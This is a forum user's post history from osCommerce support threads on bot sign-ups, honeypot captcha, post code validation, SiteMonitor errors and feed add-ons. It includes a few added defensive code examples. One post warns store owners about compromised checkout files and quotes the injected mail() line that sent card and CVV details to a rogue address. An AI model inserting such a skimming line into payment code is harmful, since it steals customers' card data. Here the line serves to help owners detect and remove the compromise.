tonymazz

Members
  • Content count

    79
Everything posted by tonymazz

  1. tonymazz

    HoneyPot Captcha

    @Jack_mcs & @ecartz Sorry, I mistyped. I made no core changes.
  2. tonymazz

    HoneyPot Captcha

    I found this snippet: https://gist.github.com/digvijay1985/b8015b58000acb27d663 for post code formats

    <?php
    $country_code = "US";
    $zip_postal = "11111";

    // Post code patterns keyed by country code.
    $ZIPREG = array(
        "US" => "^\d{5}([\-]?\d{4})?$",
        "UK" => "^(GIR|[A-Z]\d[A-Z\d]??|[A-Z]{2}\d[A-Z\d]??)[ ]??(\d[A-Z]{2})$",
        "DE" => "\b((?:0[1-46-9]\d{3})|(?:[1-357-9]\d{4})|(?:[4][0-24-9]\d{3})|(?:[6][013-9]\d{3}))\b",
        "CA" => "^([ABCEGHJKLMNPRSTVXY]\d[ABCEGHJKLMNPRSTVWXYZ])\ {0,1}(\d[ABCEGHJKLMNPRSTVWXYZ]\d)$",
        "FR" => "^(F-)?((2[A|B])|[0-9]{2})[0-9]{3}$",
        "IT" => "^(V-|I-)?[0-9]{5}$",
        // Alternatives are grouped so that ^ and $ apply to every one of them.
        "AU" => "^((0[289][0-9]{2})|([1345689][0-9]{3})|(2[0-8][0-9]{2})|(290[0-9])|(291[0-4])|(7[0-4][0-9]{2})|(7[8-9][0-9]{2}))$",
        "NL" => "^[1-9][0-9]{3}\s?([a-zA-Z]{2})?$",
        "ES" => "^([1-9]{2}|[0-9][1-9]|[1-9][0-9])[0-9]{3}$",
        "DK" => "^([D-d][K-k])?( |-)?[1-9]{1}[0-9]{3}$",
        "SE" => "^(s-|S-){0,1}[0-9]{3}\s?[0-9]{2}$",
        "BE" => "^[1-9]{1}[0-9]{3}$"
    );

    // isset() avoids an undefined-index notice for countries not in the table.
    if (isset($ZIPREG[$country_code])) {
        if (!preg_match("/" . $ZIPREG[$country_code] . "/i", $zip_postal)) {
            // Validation failed, provided zip/postal code is not valid.
        } else {
            // Validation passed, provided zip/postal code is valid.
        }
    } else {
        // Validation not available
    }
    ?>
  3. tonymazz

    HoneyPot Captcha

    I appreciate all of the input and no, I have not tried reCaptcha 3 yet. I will give that a try on one of our sites. As to the clients' complaints, I do not get it either. Although there have been times that I have become frustrated with ReCaptcha when I have to pick 3 images that match a topic like traffic lights, storefronts etc. The end result is that I realize it is for security and get on with it. It seems people are spoiled with instant purchases (i.e. PayPal, Amazon, eBay etc). I even have had a lot of clients complain about making up a password and then retyping it in, which is why we now send them a random password in the Welcome email. And yes, I do think some logic on Post Code format, as well as country/state mismatch, is a good idea for many reasons. I found these postal code patterns in HTML5 -- http://html5pattern.com/Postal_Codes to offer some initial guidance. I did mitigate this issue (for now) after the dialogue yesterday gave me an idea. Since we really do not want or need signups until a purchase or quotation is made, I removed "create_account" from all of the pages as well as the login page. Renamed the "create_account" (changed it in filenames) and now it is only offered once something is in the cart and they hit "Checkout". Perhaps this should be an option for future versions, to deploy without core code changes? A hook that would show create account (and on which pages) or not. Thanks again all!
  4. tonymazz

    HoneyPot Captcha

    My screenshot was from the admin side. We automatically send random generated passwords to the client via welcome email and try to collect minimal info at the time of checkout. I thought about the email confirmation email, however over 75% of our clients want to just check out. Any delay in the checkout process can result in a lost sale. So that would not work. I agree with you on this. Should any visitor even be creating an account without an actual purchase to start with? An option in admin could toggle that as an option for those that would. In our case we are not interested in people signing up for a subscription or discounts as some commerce sites do. Perhaps, on the confirmation page the client is offered the opportunity to create an account at the end of the checkout confirmation (admin can set default). So, create_account would not be offered as a standalone, automatic account creation would only occur after a bona fide purchase. And of course the admin would need to be able to create an account from admin side. I will noodle this more.
  5. tonymazz

    HoneyPot Captcha

    In my experience, Blacklisting is not the complete answer either. I forgot to mention that some of the IPs used are being spoofed as Bing, Google, PayPal etc. You really do not want the bot to automatically get important IPs blocked out. One time we even had our own server's IP blocked. I since whitelisted those IPs in CSF, however that gives the spoofers a wide open ticket when they use a whitelisted IP. I did do one thing that helped a good bit. In CSF I blocked CC's. In our case we blocked RU, CN, Ukraine. Again this will not help block them if they are spoofing. And this puts a lot of stress on many servers. The list of CIDR's is quite lengthy. I run dedicated servers so the overhead is not as noticeable as it could be on a shared, cloud or other. cables24h, you may want to look at the bad_behavior add-on which automatically blocks IPs via htaccess. It works well, but again if they spoof an important IP for your store, it can be detrimental. I use it, although modded for our needs to prevent certain header requests, user agents and to help block the IPs that are initiating script injections. 'better ask why someone choose your website to "spam"'. - If you are lucky enough to have a successful site, with high ranking, you will eventually get sniffed out by the spambots and script kiddies. They will find you; especially when you advertise on FB, Google and Bing which brings even more notice to our sites. Another reason: Competitors or BlackHat will sometimes do things like this to cause havoc. These signups create spam to a legit email address. Enough spam reports will get you on the RBL; once there, it takes a lot of effort and time to get removed. Until then an ISP like AOL will block your domain from sending anyone with an aol account any emails. So, unintended consequences are a real concern for us: if you make it too tight you will either block or alienate your legitimate clients. I try hard to prevent this.
I post this info in an effort to corroborate, not insult. I believe there needs to be many approaches to this issue and there is always going to be a workaround by the other side. A constantly evolving problem. @Jack_mcs I will post the details of the next signup. I delete them on the fly so I do not have one at the moment. Any hour though, unfortunately. Thanks again for your work on this project. And all of the others too!
  6. tonymazz

    HoneyPot Captcha

    I have tried reCaptcha and have had many real customers complain about it. With my own reCaptcha experiences, I must admit it is difficult to determine a storefront or traffic sign etc. It can be a real 'turn off' when registering at a site to make a purchase. I prefer to make our signup experience as hurdle and trouble free as possible. ReCaptcha2 did not prevent these signups, btw.
  7. tonymazz

    HoneyPot Captcha

    Nothing to do with HP, I see the IPs in my whosOnline. I started blocking those offenders in htaccess but quickly discovered that they changed with each visit to the site.
  8. tonymazz

    HoneyPot Captcha

    Few more points: We have honeypot installed (Math Captcha = False) and create account is still happening. I am not seeing the Password Reset events as @mhsuffolk has outlined. Not yet, anyway. They are spending about 90 seconds on average with 4 clicks, last one resulting in create_account. I created a new create_account.php and renamed it site wide including in filenames.php; within the hour the bot or ? figured out the new page, which confirms it is not coming right in to the create_account.php page. It seems to come in on a product page and then go to 'create account' without adding anything to the cart.
  9. tonymazz

    HoneyPot Captcha

    @Jack_mcs, @mhsuffolk & @Mikepo We are getting about 15 to 20 of these 'create account' per day. Assorted letters in both upper and lower case with random lengths. The email addresses are 98% legit, so that means that our system is sending Welcome Spam, nice. The phone number field is a string of numbers and appears to be legit looking. I have the fax field disabled. I have been watching these sign-ups for a common thread that could be used to block registration. They are picking the first country listed. Maybe that country could be a country that you don't ship to and then block that registration. I also noticed that the Post Code is always a string of random letters (upper and lower case), but no numbers. This could definitely be a source for blocking since I am unaware of any countries we ship to that are all letters. The IPs switch so blocking the IP is an exercise in futility. I have seen a different country for each sign-up.
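
The sign-up traits described in the post above (letters-only post code, first-listed country, random mixed-case names), turned into a server-side check. This is an added example, not part of the original post and not osCommerce or add-on code; the field names, the `SHIP_TO` list and the two-signal threshold are assumptions.

```php
<?php
// Added illustration only. Field names, the shipping list and the
// two-signal threshold are assumptions, not osCommerce or add-on code.

const SHIP_TO = ['US', 'CA', 'GB', 'DE'];   // hypothetical store's shipping countries

function signup_flags(array $s): array
{
    $flags = [];
    $postcode = trim($s['postcode'] ?? '');
    // Signal 1: post code made of letters only, no digit anywhere.
    if ($postcode !== '' && preg_match('/^[A-Za-z]+$/', $postcode)) {
        $flags[] = 'postcode_letters_only';
    }
    // Signal 2: country left at the first option, which this store does not ship to.
    if (!in_array($s['country'] ?? '', SHIP_TO, true)) {
        $flags[] = 'country_not_shipped';
    }
    // Signal 3: names with repeated lower-to-upper case flips ("qXwRtb").
    // One flip is normal ("McDonald"), so require two or more.
    $name = ($s['firstname'] ?? '') . ' ' . ($s['lastname'] ?? '');
    if (preg_match_all('/\p{Ll}\p{Lu}/u', $name) >= 2) {
        $flags[] = 'name_random_case';
    }
    return $flags;
}

function signup_verdict(array $s): string
{
    $n = count(signup_flags($s));
    // A single signal only holds the account for review, so that a real
    // customer with an unusual name or address is not turned away.
    return $n >= 2 ? 'reject' : ($n === 1 ? 'review' : 'accept');
}

// Constructed sample submissions (not real data).
$samples = [
    ['firstname' => 'Ann',    'lastname' => 'McDonald', 'country' => 'US', 'postcode' => '11111'],
    ['firstname' => 'qXwRtb', 'lastname' => 'LmNoPz',   'country' => 'AF', 'postcode' => 'hGtRwQ'],
    ['firstname' => 'Jo',     'lastname' => 'Smith',    'country' => 'GB', 'postcode' => 'SWA'],
];
foreach ($samples as $s) {
    printf("%-8s %-45s %s\n", signup_verdict($s), implode(',', signup_flags($s)) ?: '-', $s['postcode']);
}
```

Run the verdict before the account row is written and before the Welcome email is sent, so a rejected sign-up generates no outbound mail.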
  10. tonymazz

    HoneyPot Captcha

    Thank you. I am having an issue with my tests, allowing incorrect math sum to still create accounts. When the field is left empty, one cannot continue however any answer will allow the account creation. Any idea what I may be missing? Thanks again...
  11. tonymazz

    HoneyPot Captcha

    Hi Jack. Thank you for all of the many hours you put in to these addons!! In reviewing this I noticed a define missing in the languages: define('FORM_REQUIRED_INPUT', 'Enter Total Here');
  12. If you want it to show in subcategories, either specify the cat id or use enter ALL. When adding or updating extra fields, put the desired categories id in the Category field, followed by a COMMA. The trailing COMMA is important, you need to add it after each category id even if you only write one category! If you want to have a field that will be used for all products, write "all" and nothing else. If you have subcategories, you can also put parent categories id here, the field will show up in all subcategories as well.
  13. tonymazz

    The Feedmachine Solution

    On your first issue, try this: 'price' => array('output' => 'FINAL_PRICE_WITHOUT_TAX', 'type' => 'KEYWORD'), I did and I now get the exact price including special if applicable.
  14. tonymazz

    The Feedmachine Solution

    Hi! I too need assistance with Shopzilla's field limits. Your efforts are appreciated.
  15. tonymazz

    The Feedmachine Solution

    Hi! Thanks for the contribution. Seems to be working fine until I disable a category using the contribution DISABLE/ENABLE CATEGORIES at http://addons.oscommerce.com/info/6462 . Have you run into this and is there a way for me to ignore the categories I have disabled? Thanks in advance for all of your efforts. BR, Tony...
  16. tonymazz

    SiteMonitor

    I am on the same server with different accounts. One account is fine, the Site Monitor works great, as well does the Hacker Code portion. However when I try the same thing in the other account which has all data directories linked. The osCommerce files are not linked and are what I want to monitor with this contribution like I do on the main account. I was hoping to do this with all of my stores. They all link back (just like public_html & www) to the main account files. In each instance the osCommerce files are unique & not linked. My problem is on each of those linked directories I get the error codes as follows: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 256 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 And then it craps out. It does not seem to want to ignore the linked directories. Thanks
  17. tonymazz

    SiteMonitor

    Hi again; I found this code to exclude a file, would this work on directories, as well? I have tried a couple variations with no luck. Here is the error I am getting for each directory that is linked: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/XXXSSS/public_html/mannix (errno=13 - Permission denied) in /home/XXXSSS/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Thanks again...
  18. tonymazz

    SiteMonitor

    Hi Jack; along the lines of the directories to be ignored. I have one site that is mostly symbolic links. Is there a way to ignore them? Thanks for your efforts on this contribution.
  19. tonymazz

    SiteMonitor

    Hi! Thanks for a great contribution. Need a little help. I have this working great on my base shop, but when I try to use it on a different shop that utilizes a great deal of 'symbolic links', I get a string of errors for each linked directory. Like this: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/catalog/public_html/manuals/manuals (errno=13 - Permission denied) in /home/catalog/public_html/admin/includes/functions/sitemonitor_functions.php on line 174 I tried excluding the linked directories without success. Has anyone come across a 'work-around' for this? Thanks again!
  20. tonymazz

    Authorize.net is down

    Not sure if this is related to the Authorize.net outage. When I was alerted that the credit card transactions were not processing, I started looking into the pages that were hanging up. Inspect these files: checkout_payment.php, checkout_confirmation.php, checkout_process.php . Verify that there are no added scripts which will email the CC info to a rogue address. I found this on 2 sites I maintain so far. Both using heavily modded versions of osCommerce 2.2. Be sure to remove this code. The line of code that instructs it to mail the vital info is something like this: mail("rogue.email@public_email.com","Cvv - Site $site!",$message123,$headers123)
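
A way to run the inspection described in the post above: list every direct call to PHP's `mail()` in the three checkout files so each can be reviewed by hand. This is an added example, not part of the original post and not osCommerce code; the sample source is constructed, and the script assumes it is run from the catalog directory.

```php
<?php
// Added illustration, not osCommerce code. Lists direct calls to PHP's
// mail() in a source string so each one can be reviewed by hand.

function find_mail_calls(string $source): array
{
    $hits = [];
    $tokens = token_get_all($source);
    $count = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        $t = $tokens[$i];
        if (!is_array($t)) {
            continue;
        }
        // Only identifiers count; text inside strings and comments is skipped.
        // PHP 8 reports "\mail" as T_NAME_FULLY_QUALIFIED, so accept both kinds.
        $kind = token_name($t[0]);
        if (!in_array($kind, ['T_STRING', 'T_NAME_FULLY_QUALIFIED'], true)
            || strtolower(ltrim($t[1], '\\')) !== 'mail') {
            continue;
        }
        // Skip whitespace and require the opening parenthesis of a call.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j < $count && $tokens[$j] === '(') {
            $hits[] = $t[2];   // line number of the call
        }
    }
    return $hits;
}

// Constructed sample: a comment and a string that mention mail(, the
// store's own tep_mail() helper, and one direct mail() call.
$sample = <<<'SRC'
<?php
// send mail( later
$note = 'mail(';
tep_mail($name, $to, $subject, $body, $from_name, $from);
mail($addr, "Cvv - Site $site!", $message123, $headers123);
SRC;
echo "sample: line(s) " . implode(', ', find_mail_calls($sample)) . "\n";

// Files named in the post; any that are missing are skipped.
foreach (['checkout_payment.php', 'checkout_confirmation.php', 'checkout_process.php'] as $f) {
    if (is_readable($f)) {
        echo $f . ": line(s) " . (implode(', ', find_mail_calls(file_get_contents($f))) ?: 'none') . "\n";
    }
}
```

The check also reports method calls and function definitions named `mail`, and it does not see calls hidden behind `eval` or encoded strings, so an empty result is not proof that a file is clean.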
  21. tonymazz

    OSC-Affiliate

    Hi! Thanks for the reply & PM pizza. I tried your suggestions with no differences. I did finally get the images to work, however I had to create a new directory for my images and place a copy of each of my images in to it. Basically when I debugged it I found that the show banner is not placing the / between the 2 directories. For example /catalog/images - becomes catalogimages. So by creating a new image folder named catalogimages the problem is solved for now. Does anyone know how to correct this without changing the main configure file. When I change the main configure file none of the images work on the site at all. Thanks again, Tony...
  22. tonymazz

    OSC-Affiliate

    Have you found a solution to the images not showing up yet? I too am having that issue. Any help is appreciated
  23. Anyone figure the solution out for this, as I too am having the same issue...